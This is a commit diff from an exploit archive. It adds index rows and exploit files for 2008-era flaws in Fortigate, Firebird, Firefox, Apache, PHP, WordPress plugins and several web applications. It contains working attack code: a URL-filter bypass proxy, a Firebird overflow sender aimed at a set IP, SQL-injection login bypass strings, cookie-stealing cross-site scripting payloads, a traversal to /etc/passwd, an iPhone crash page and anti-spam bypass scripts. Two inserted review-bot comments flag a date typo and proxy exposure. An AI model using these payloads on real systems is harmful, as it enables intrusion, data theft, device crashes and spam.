Updated 01_21_2014

Offensive Security 2014-01-21 04:28:26 +00:00
parent 1c19131a67
commit acf3e755a7
46 changed files with 1349 additions and 0 deletions


@ -27841,3 +27841,48 @@ id,file,description,date,author,platform,type,port
31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow Vulnerability",2008-01-11,anonymous,windows,remote,0 31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow Vulnerability",2008-01-11,anonymous,windows,remote,0
31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP <= 9.4.3 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0 31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP <= 9.4.3 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0
31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Include Vulnerability",2008-01-14,Smasher,cgi,webapps,0 31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Include Vulnerability",2008-01-14,Smasher,cgi,webapps,0
31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate CRLF Characters URL Filtering Bypass Vulnerability",2008-01-14,Danux,hardware,remote,0
31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0
31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0
31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0
31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass Vulnerability",2007-01-15,Romero,php,webapps,0
31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 URI Security Bypass Vulnerability",2008-01-16,nnposter,hardware,remote,0
31034,platforms/php/webapps/31034.txt,"MyBB <= 1.2.10 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0
31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0
31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0
31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 index.php cat Parameter XSS",2008-01-18,"H-T Team",php,webapps,0
31039,platforms/windows/remote/31039.txt,"BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability",2008-01-19,"Oliver Karow",windows,remote,0
31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 ActiveX Control Buffer Overflow Vulnerabilities",2008-01-20,rgod,windows,remote,0
31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0
31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b 'upload.asp' Cross-Site Scripting Vulnerability",2008-01-21,Doz,asp,webapps,0
31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router Cross-Site Request Forgery Vulnerability",2008-01-21,WarGame,cgi,webapps,0
31044,platforms/php/webapps/31044.txt,"singapore 0.10.1 Modern Template 'gallery' Parameter Cross-Site Scripting Vulnerability",2008-01-21,trew,php,webapps,0
31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 'ffile' Parameter Remote File Include Vulnerability",2008-01-21,anonymous,php,webapps,0
31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 ActiveX Control 'ChatRoom()' Buffer Overflow Vulnerability",2008-01-09,Knell,windows,remote,0
31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 'txt' Parameter Cross-Site Scripting Vulnerability",2008-01-22,"Jan Fry",multiple,remote,0
31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-01-22,RawSecurity.org,php,webapps,0
31049,platforms/php/webapps/31049.txt,"DeluxeBB 1.1 'attachments_header.php' Cross-Site Scripting Vulnerability",2008-01-22,NBBN,php,webapps,0
31050,platforms/multiple/remote/31050.php,"Firebird <= 2.0.3 Relational Database 'protocol.cpp' XDR Protocol Remote Memory Corruption Vulnerability",2008-01-28,"Damian Frizza",multiple,remote,0
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 chrome:// URI JavaScript File Request Information Disclosure Vulnerability",2008-01-19,"Gerry Eisenhaur",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability",2008-01-22,"Stefano Di Paola",linux,remote,0
31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass Vulnerability",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure Vulnerability",2008-01-23,"AmnPardaz ",asp,webapps,0
31056,platforms/windows/remote/31056.py,"HFS HTTP File Server 1.5/2.x Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service Vulnerability",2008-01-24,fuzion,osx,dos,0
31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts 'user_login.asp' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
31059,platforms/asp/webapps/31059.txt,"E-SMART CART 'Members Login' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 'index.php' Cross-Site Scripting Vulnerability",2008-01-25,"Omer Singer",php,webapps,0
31061,platforms/php/webapps/31061.txt,"trixbox 2.4.2 user/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
31062,platforms/php/webapps/31062.txt,"trixbox 2.4.2 maint/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 pref.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 search.php adv Parameter XSS",2008-01-25,"Omer Singer",php,webapps,0
31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 'report_type' Cross-Site Scripting Vulnerability",2008-01-26,nnposter,php,webapps,0
31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module 'connector.php' Cross-Site Scripting Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0
31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 'install.php' Local File Include Vulnerability",2008-01-28,p4imi0,php,webapps,0
31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility Arbitrary File Upload Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0
31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 'index.php' Cross-Site Scripting Vulnerability",2008-01-28,jekil,php,webapps,0
31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page SQL Injection Vulnerability",2008-01-28,T_L_O_T_D,asp,webapps,0
31071,platforms/cgi/webapps/31071.txt,"VB Marketing 'tseekdir.cgi' Local File Include Vulnerability",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0
31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 FileUpload Class Unauthorized File Upload Vulnerability",2007-01-05,titon,windows,remote,0
31073,platforms/java/webapps/31073.html,"SunGard Banner Student 7.3 'add1' Parameter Cross-Site Scripting Vulnerability",2008-01-29,"Brendan M. Hickey",java,webapps,0
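Review bot: The new index row for 31030 (SpamBam WordPress Plugin Key Calculation Security Bypass) carries the date `2007-01-15`, while the neighbouring rows and its source advisory added in this same commit (securityfocus bid 27291, adjacent to 31029's bid 27287 dated 2008-01-15) point to January 2008; this looks like a year typo and should probably read `2008-01-15`. Row 31072 also carries a 2007 date (`2007-01-05`) and may have the same slip, but nothing on this page confirms that one.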



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27368/info
MegaBBS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
MegaBBS 1.5.14b is vulnerable; other versions may also be affected.
http://www.example.com/path/profile-upload/upload.asp?target=code


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27419/info
Web Wiz Forums, NewsPad, and Rich Text Editor are prone to a remote information-disclosure vulnerability because they fail to properly sanitize user-supplied input.
An attacker can exploit this issue to retrieve arbitrary files in the context of the webserver process. Information obtained may aid in further attacks; other attacks are also possible.
This issue affects Forums 9.07, NewsPad 1.02, and Rich Text Editor 4.0; other versions may also be vulnerable.
http://www.example.com/RTE_file_browser.asp?look=&sub=\.....\\\.....\\\.....\\http://www.example.com/RTE_file_browser.asp?look=save&sub=\.....\\\.....\\\.....\\\.....\\\.....\\\


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27450/info
Pre Hotel and Resorts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Passing the following will bypass the authentication process:
' or '

13
platforms/asp/webapps/31059.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/27452/info
E-SMART CART is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following exploit information is available:
Passing:
' or '
will bypass the authentication process.

13
platforms/asp/webapps/31070.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/27474/info
ASPired2Protect is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following exploit information is available:
Passing:
' or '
will bypass the authentication process.


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27374/info
Alice Gate2 Plus Wi-Fi routers are prone to a cross-site request-forgery vulnerability.
An attacker can exploit this issue to alter administrative configuration on affected devices. Specifically, altering the wireless encryption settings on devices has been demonstrated. Other attacks may also be possible.
http://www.example.com/cp06_wifi_m_nocifr.cgi?wlChannel=Auto&wlRadioEnable=on


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27475/info
VB Marketing is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to include local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks.
http://www.example.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00


@ -0,0 +1,222 @@
source: http://www.securityfocus.com/bid/27276/info
Fortinet Fortigate is prone to a vulnerability that can allow attackers to bypass the device's URL filtering.
An attacker can exploit this issue to view unauthorized websites, bypassing certain security restrictions. This may lead to other attacks.
This issue affects Fortigate-1000 3.00; other versions may also be affected.
NOTE: This issue may be related to the vulnerability described in BID 16599 (Fortinet Fortigate URL Filtering Bypass Vulnerability).
#!/usr/bin/perl
########################################
# fortiGuard.pl v0.1 - http://www.macula-group.com/
#
# # URL Filtering Bypass proof of concept
# Author: Daniel Regalado aka Danux... Hacker WannaBe!!! (only some
minnor modifications from sinhack code)
# Based on PoC from sinhack research labs -> sakeru.pl
#
#FortiGuard's URL blocking functionality can be bypassed by
specially-crafted HTTP requests that are terminated by the CRLF
character
#instead of the LF characters and changing version of HTTP to 1.0
without sending Host: Header and Fragmenting the GET and POST Requests
#
#Tested On: fortiGate-1000 3.00, build 040075,070111
#
#This code has been released Only for educational purposes. The author
cannot be held responsible for any bad use.
# Usage:
# 1) perl fortiGuard.pl
# 2) Configure your browser's proxy at localhost:5050
# 3) Have fun.
# --- Start Of Script---
use strict;
use URI;
use IO::Socket;
my $showOpenedSockets=1; #Activate the console logging
my $debugging=0;
my $server = IO::Socket::INET->new ( #Proxy Configuration
LocalPort => 5050, #Change the listening port here
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10);
binmode $server;
print "Waiting for connections on port 5050 TCP...\n";
while (my $browser = $server->accept()) { #When a connection occure...
binmode $browser;
my $method="";
my $content_length = 0;
my $content = 0;
my $accu_content_length = 0;
my $host;
my $hostAddr;
my $httpVer;
my $line;
while (my $browser_line = <$browser>) { #Get the Browser commands
unless ($method) {
($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+)
+(\S+) +(\S+)/;
my $uri = URI->new($hostAddr);
$host = IO::Socket::INET->new ( #Opening the connexion to the
remote host
PeerAddr=> $uri->host,
PeerPort=> $uri->port ) or die "couldn't open $hostAddr";
if ($showOpenedSockets) { #Connection logs
#print "Source:".$browser->peerhost."\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) =
localtime(time);
$year += 1900;
$mon += 1;
printf ("\n%04d-%02d-%02d %02d:%02d:%02d
",$year,$mon,$mday,$hour,$min,$sec);
print $browser->peerhost." -> ".$uri->host.":".$uri->port."
$method ".$uri->path_query."\n";;
}
binmode $host;
my $char;
if ($method == "GET") { #Fragmention the "GET" query
foreach $char ('G','E','T',' ') { #I know, there is better
way to do it,
print $host $char; #but I'm tired and lazy...
}
} elsif ($method == "POST") { #Fragmentation of "POST" query
foreach $char ('P','O','S','T',' ') {
print $host $char;
}
} else {
print $host "$method "; #For all the other methods, send
them without modif
print "*";
}
$httpVer="HTTP/1.0"; #Forzando a version 1.0
print $host $uri->path_query . " $httpVer\r\n"; #Send the rest
of the query (url and http version)
#next;
}
$content_length = $1 if $browser_line=~/Content-length: +(\d+)/i;
$accu_content_length+=length $browser_line;
foreach $line (split('\n', $browser_line)) { #Fragment the Host query
if ($line =~ /^Host:/ ) {
#my $char="";
#my $word="";
#my $bogus="";
#($bogus,$word) = split(' ', $line);
#foreach $char ('H','o','s','t',':',' ') {
#print $host $char;
#}
#print $host $word."\r\n";
} else {
print $host "$line\r\n"; #For all the other lines, send
them without modif
}
if ( $debugging == 1 && $method == "POST" ) {
print "$line\n";
}
}
#Danux Clave para terminar el Request y enviarlo al servidor
web, de otra forma se queda esperando este ultimo la peticion
print $host "\r\n";
last if $browser_line =~ /^\s*$/ and $method ne 'POST';
if ($browser_line =~ /^\s*$/ and $method eq "POST") {
$content = 1;
last unless $content_length;
next;
}
#print length $browser_line . " - ";
if ($content) {
$accu_content_length+=length $browser_line;
last if $accu_content_length >= $content_length;
}
}
$content_length = 0;
$content = 0;
$accu_content_length = 0;
my $crcount=0;
my $totalcounter=0;
my $packetcount=0;
while ( my $host_line = <$host> ) { #Reception of the result from the server
$totalcounter+=length $host_line;
print $browser $host_line; #Send them back to the browser
#print $host_line if ( ! $content ); #Send them back to the browser
if ($host_line=~/Content-length: +(\d+)/i) {
$content_length = $1;
#print " * Expecting $content_length\n"; #if ($debugging);
}
if ($host_line =~ m/^\s*$/ and not $content) {
$content = 1;
#print " * Beginning of the data section\n";
}
if ($content) {
#$accu_content_length+=length $host_line;
if ($content_length) {
#print " * binary data section\n";
my $buffer;
my $buffersize = 512;
if ($content_length < $buffersize) { $buffersize = $content_length; }
while ( my $nbread = read($host, $buffer, $buffersize)) {
print "#";
$packetcount++;
$accu_content_length+=$nbread;
#last if $accu_content_length >= $content_length;
print $browser $buffer; #Send them back to the browser
#print $buffer;
#print "\n(#$packetcount) ";
#print "total: $totalcounter content_length:
$content_length acc: $accu_content_length\t";
my $tmp1 = $content_length - $accu_content_length;
#print "length-accu= $tmp1\n";
if ($tmp1 < $buffersize) {
$buffersize = $tmp1;
#print "new buffersize = $buffersize\n";
}
}
#print "Out of the content while\n";
}
}
#print "(#$packetcount) ";
#print "total: $totalcounter content_length: $content_length
acc: $accu_content_length\t";
#my $tmp1 = $content_length - $accu_content_length;
#print "length-accu= $tmp1\n";
last if ($accu_content_length >= $content_length and $content ==
1 and $content_length);
}
#print "\nOut for a while\n";
if ($browser) { $browser -> close; } #Closing connection to the browser
if ($host) { $host -> close; } #Closion connection to the server
}
# --- EOF ---
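Review bot: The listening socket in the "Proxy Configuration" block is created with only `LocalPort => 5050`, so it binds every interface and any host that can reach the machine gets an unauthenticated open proxy, although the usage header only expects the local browser. Adding `LocalAddr => '127.0.0.1',` next to `LocalPort => 5050,` limits it to loopback, and the usage header should state that the script must not be left running on a shared network. The `# Usage:` header also says nothing about this exposure or about the `die` on a failed remote connect, which ends the whole proxy on one unreachable host; a sentence on both would help anyone reading the file.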


@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/27309/info
8e6 R3000 Internet Filter is prone to a vulnerability that allows attackers to bypass URI filters.
Attackers can exploit this issue by sending specially crafted HTTP request packets for an arbitrary website. Successful exploits allow attackers to view sites that the device is meant to block access to. This could aid in further attacks.
R3000 Internet Filter 2.0.05.33 is vulnerable; other versions may also be affected.
packet 1: GE
packet 2: T / HTTP/1.0\r\n
packet 1: GET / HTTP/1.0
X-SomeHeader: ...
....
packet 2: X-SomeOtherHeader: ....
Host: www.example.com
...



@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/27406/info
Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local JavaScript, images and stylesheets files.
Attackers can exploit this issue to gain access to potentially sensitive information that could aid in further attacks.
Firefox 2.0.0.11 is vulnerable; other versions may also be affected.
NOTE: For an exploit to succeed, a user must have an addon installed that does not store its contents in a '.jar' file. The attacker would have to target a specific addon that uses "flat" packaging.
<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script> <script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script>


@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/27409/info
Apache 'mod_negotiation' is prone to an HTML-injection and an HTTP response-splitting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is served, cached, or interpreted; other attacks are also possible.
// Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
// Compile with flex compiler
package
{
import flash.display.Sprite;
import flash.net.*
public class TestXss extends flash.display.Sprite {
public function TestXss(){
var r:URLRequest = new URLRequest('http://victim/<img%20src=sa%20
onerror=eval(document.location.hash.substr(1))>#alert(123)');
r.method = 'POST';
r.data = unescape('test');
r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg; q=0'));
navigateToURL(r, '_self');
}
}
}


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27394/info
Novemberborn sIFR is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to sIFR 2.0.3 and 3r278 are vulnerable.
https://www.example.com/<fontname>.swf?txt=<a href="http://www.example2.com">click me!</a> http://www.example.com/fonts/FuturaLt.swf?txt=%3Ca%20href=%22javascript:alert(document.cookie)%22%3Eclick%20me!%3C/a%3E&textalign=left&offsetTop=-2&textcolor=


@ -0,0 +1,73 @@
source: http://www.securityfocus.com/bid/27403/info
Firebird is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to overflow a buffer and to corrupt process memory.
Attackers may be able to execute arbitrary machine code in the context of an affected application. Failed exploit attempts will likely result in a denial-of-service condition.
<?php
/** * FIREBIRD REMOTE BUFFER OVERFLOW.
* ITDEFENCE.ru Proof-of-Concept (POC)
* Eugene Minaev (underwater@itdefence.ru)
*
* Integer overflow in Firebird SQL 1.0.3 and earlier, 1.5.x before 1.5.6, 2.0.x before 2.0.4, and 2.1.x before 2.1.0 * RC1 might allow remote attackers to execute arbitrary code via crafted op_receive, op_start, op_start_and_receive, * op_send, (5) op_start_and_send, and (6) op_start_send_and_receive XDR requests, which triggers memory corruption.
*
* Vulnerable packages
*
* Firebird SQL 1.0.3 and before.
* Firebird SQL 1.5.5 and before.
* Firebird SQL 2.0.3 and before.
* Firebird SQL 2.1.0 Beta 2 and before.
*
* Non-vulnerable packages
*
* Firebird SQL 1.5.6 (to be released)
* Firebird SQL 2.0.4 (to be released)
* Firebird SQL 2.1.0 RC1
*
* src/remote/protocol.cpp:417
*
* MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));
* MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_incarnation));
* MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_transaction));
* MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_message_number));
* return xdr_request(xdrs, data->p_data_request,
* data->p_data_message_number,
* data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);
*
* Firebird Connect Packet
* * 0x0000 00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00 ..............E.
* 0x0010 00 BC 00 00 00 00 40 06-00 25 C0 A8 7C 63 C0 A8 .&#1112;....@..%&#1040;&#1025;|c&#1040;&#1025;
* 0x0020 7C 63 0B EA 0E 94 00 00-00 01 00 00 00 01 50 10 |c.&#1082;.?........P.
* 0x0030 40 00 00 00 00 00 00 00-00 01 00 00 00 13 00 00 @...............
* 0x0040 00 02 00 00 00 1D 00 00-00 3C 43 3A 5C 50 72 6F .........<C:\Pro
* 0x0050 67 72 61 6D 20 46 69 6C-65 73 5C 46 69 72 65 62 gram Files\Fireb
* 0x0060 69 72 64 5C 46 69 72 65-62 69 72 64 5F 31 5F 35 ird\Firebird_1_5
* 0x0070 5C 65 78 61 6D 70 6C 65-73 5C 45 4D 50 4C 4F 59 \examples\EMPLOY
* 0x0080 45 45 2E 66 64 62 00 00-00 02 00 00 00 13 01 04 EE.fdb..........
* 0x0090 52 4F 4F 54 04 09 75 6E-64 65 72 77 68 61 74 06 ROOT..underwhat.
* 0x00A0 00 00 00 00 00 08 00 00-00 01 00 00 00 02 00 00 ................
* 0x00B0 00 03 00 00 00 02 00 00-00 0A 00 00 00 01 00 00 ................
* 0x00C0 00 02 00 00 00 03 00 00-00 04 ..........
* * Firebird Login Packet.
*
* 0x0000 00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00 ..............E.
* 0x0010 00 94 00 00 6C 6C 40 06-93 E0 C0 A8 7C 63 C0 A8 .?..ll@.?&#1072;&#1040;&#1025;|c&#1040;&#1025;
* 0x0020 7C 63 0B EA 0E 94 00 00-00 95 00 00 00 11 50 10 |c.&#1082;.?...?....P.
* 0x0030 40 00 00 00 00 00 00 00-00 13 00 00 00 00 00 00 @...............
* 0x0040 00 3C 43 3A 5C 50 72 6F-67 72 61 6D 20 46 69 6C .<C:\Program Fil
* 0x0050 65 73 5C 46 69 72 65 62-69 72 64 5C 46 69 72 65 es\Firebird\Fire
* 0x0060 62 69 72 64 5F 31 5F 35-5C 65 78 61 6D 70 6C 65 bird_1_5\example
* 0x0070 73 5C 45 4D 50 4C 4F 59-45 45 2E 66 64 62 00 00 s\EMPLOYEE.fdb..
* 0x0080 00 1E 01 1C 06 53 59 53-44 42 41 1E 0B 51 50 33 .....SYSDBA..QP3
* 0x0090 4C 4D 5A 2F 4D 4A 68 2E-3A 04 00 00 00 00 3E 00 LMZ/MJh.:.....>.
* 0x00A0 00 00 ..
*
*/
$___suntzu = "\x00\x00\x00\x4a" . str_repeat( "\x4a" , 3000);
for ($temp = 0; $temp < 5; $temp ++){
$___zuntzu = fsockopen('192.168.124.99',3050);
fwrite($___zuntzu , $___suntzu);
fclose($___zuntzu );
sleep(1);
}
?>

9
platforms/osx/dos/31057.html Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27442/info
Apple iPhone is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue by enticing an unsuspecting user to view a maliciously crafted webpage. Successful attacks cause a kernel panic, crashing the device. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.
iPhone 1.1.2 and 1.1.3 are affected; other versions may also be vulnerable.
<html><body><script> function Demo() { var shellcode; var addr; var fill; alert('attempting a crash!'); shellcode = unescape('%u0c0c'); fill = unescape('%ucccc'); addr = 0x02020202; var b = fill; while (b.length <= 0x40000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } } </script> <input type='button' onClick='Demo()' value='Go!'> </body></html>

9
platforms/php/remote/31053.php Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27413/info
PHP cURL is prone to a 'safe mode' security-bypass vulnerability.
Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.
The issue affects PHP 5.2.5 and 5.2.4.
var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00&quot;.__FILE__)));

12
platforms/php/webapps/31027.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/27282/info
pMachine Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The issues affect pMachine Pro 2.4.1; other versions may also be vulnerable.
NOTE: pMachine Pro has been replaced by ExpressionEngine. The vendor recommends upgrading.
http://www.example.com/pm/language/spanish/preferences.php?L_PREF_NAME[855]=<script>alert(ZOMG!);</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27286/info
Article Dashboard is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/admin/login.php?user=admin'-- | /*

60
platforms/php/webapps/31029.pl Executable file

@ -0,0 +1,60 @@
source: http://www.securityfocus.com/bid/27287/info
Peter's Math Anti-Spam for WordPress is prone to a security-bypass vulnerability.
This issue occurs when presenting a visitor with challenge data to determine if they are a legitimate user or an automaton. The challenge data is poorly obfuscated and can be interpreted by script code.
Attackers can leverage this issue to bypass the security measures provided by the plugin via an automated script. This could aid in spam distribution and other attacks.
Peter's Math Anti-Spam for WordPress 0.1.6 is vulnerable; other versions may also be affected.
$ cat math_spam.pl
#!/usr/bin/perl -w
require bytes;
my $buffer;
my $number;
my $op1;
my $op2;
my %numberPrints = ("0045", 0,
"00c5", 1,
"0485", 2,
"4309", 3,
"0205", 4,
"0847", 5,
"0601", 6,
"0644", 7,
"0405", 8,
"0031", 9);
my %numberSizes = ( 0, 4045,
1, 3983,
2, 4431,
3, 4250,
4, 4595,
5, 5389,
6, 4949,
7, 4436,
8, 4584,
9, 5009);
my $PLUS_SIZE = 7365;
open (INFILE, "<$ARGV[0]");
binmode(INFILE);
sysseek(INFILE, 14, 0); #That "0" third argument makes seeking
absoulte
sysread(INFILE, $buffer, 2);
#$number = sprintf("%x%x", map {ord($_)}
split(//,substr($buffer,0,2)));
$number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
$op1 = $numberPrints{$number};
sysseek(INFILE, $numberSizes{$op1} + $PLUS_SIZE - 2, 1); #That
third "1" argument makes seeking relative
sysread(INFILE, $buffer, 2);
$number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
$op2 = $numberPrints{$number};
print $op1 . " + " . $op2 . " = " . ($op1+$op2) . "\n";
close(INFILE);

102
platforms/php/webapps/31030.pl Executable file

@ -0,0 +1,102 @@
source: http://www.securityfocus.com/bid/27291/info
SpamBam is prone to a security-bypass vulnerability because client-accessible data can be used to calculate verification keys.
Attackers can exploit this issue to submit arbitrary form data via automated scripts and distribute spam.
#!/usr/bin/perl -w
# Defeating SpamBam exploit
# by Jose Palazon (josem.palazon@gmail.com) (a.k.a. palako)
# Vulnerable software:
# SpamBam (http://wordpress.org/extend/plugins/spambam/) by Gareth Heyes
# Vulnerability:
# No matter how hard you ofuscate or encrypt your code, never, under no
circunstances, rely
# any security aspect on the client. Never!
# How the plugin works:
# It generates a pseudo-random code both on the client and the server to
generate a key.
# On form submit, both key values are checked and they should match to
allow comment insertion.
#How the exploit works:
# It does nothing but acting as a client. It parses the html, extracts
the javascript, process it
# to calculate the key and fills the hidden field with it.
# Solution:
# Sorry guys but there's no fix for this. It'ss just a design flaw.
use WWW::Mechanize;
use JavaScript::SpiderMonkey;
my $tmpContent;
my $javascriptCode;
my $spamBamKey;
die ("Usage: spambam.pl <post url> <author> <email> <comment>\n") unless
$ARGV[3];
my $url = $ARGV[0];
